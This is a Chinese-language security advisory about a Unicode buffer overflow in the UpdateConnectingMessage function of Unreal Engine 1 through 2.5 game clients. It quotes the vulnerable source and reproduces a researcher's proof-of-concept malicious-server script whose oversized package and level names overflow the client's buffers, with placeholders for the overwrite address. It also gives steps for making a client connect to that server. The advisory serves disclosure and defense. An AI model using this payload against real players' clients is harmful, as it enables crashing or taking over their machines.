受影响系统:
Epic Games Unreal Engine 2.5
Epic Games Unreal Engine 2
Epic Games Unreal Engine 1
描述:
Unreal引擎是一款被很多游戏使用的网络游戏引擎。
Unreal引擎客户端在下载或尝试下载服务器上所使用的缺失软件包期间UpdateConnectingMessage函数中存在unicode缓冲区溢出漏洞:
void UGameEngine::UpdateConnectingMessage()
{
if(GPendingLevel && Players.Num() && Players(0)->Actor)
{
if(Players(0)->Actor->ProgressTimeOut < Players(0)->Actor->Level->TimeSeconds)
{
TCHAR Msg1[256], Msg2[256];
appSprintf( Msg1, *LocalizeProgress(TEXT("ConnectingText"),TEXT("Engine")) );
appSprintf( Msg2, *LocalizeProgress(TEXT("ConnectingURL"),TEXT("Engine")), *GPendingLevel->URL.Host, *GPendingLevel->URL.Map );
SetProgress( Msg1, Msg2, 60.f );
}
}
}
溢出的起因是appSprintf是最多为1024字节的_vsnwprintf的封装程序,而目标缓冲区仅为256字节。
客户端必须启用了下载([IpDrv.TcpNetDriver]->AllowDownloads=True)才会受这个漏洞影响,而默认下大多数游戏都启用了这个设置。
<*来源:Luigi Auriemma (aluigi@pivx.com)
链接:http://secunia.com/advisories/40466/
http://aluigi.altervista.org/adv/unrealcbof-adv.txt
*>
测试方法:
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
// Unreal engine <= 2.5 clients unicode buffer-overflow in UpdateConnectingMessage
// by Luigi Auriemma
// e-mail: aluigi@autistici.org
// web: aluigi.org
//
// Advisory:
// http://aluigi.org/adv/unrealcbof-adv.txt
//
// – http://aluigi.org/testz/unrealts.zip
// – launch it: unrealts 7777 unrealcbof.txt
// – launch a game based on the Unreal engine
// – open the console (~)
// – type: open 127.0.0.1:7777
// – it’s also possible to launch directly the game: game.exe 127.0.0.1:7777
// CHALLENGE can be random
CHALLENGE CHALLENGE=12345678
// GUID can be random
USES GUID=FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF PKG=bof FLAGS=1 SIZE=1 FNAME=bof
// some games like SWAT4 require that LEVEL of WELCOME and this PKG are the same
USES GUID=FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF PKG=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAxxxxAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA FLAGS=1 SIZE=1 FNAME=bof
// enable any possible type of download
DLMGR CLASS=Engine.ChannelDownload PARAMS=Enabled COMPRESSION=0
DLMGR CLASS=IpDrv.HTTPDownload PARAMS=http://127.0.0.1/ COMPRESSION=0
// LEVEL must contain the overflow and shellcode (the UDP packet must be max 576 bytes or less for some games)
WELCOME LEVEL=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAxxxxAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA LONE=0
建议:
厂商补丁:
Epic Games
———-
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
0 条评论。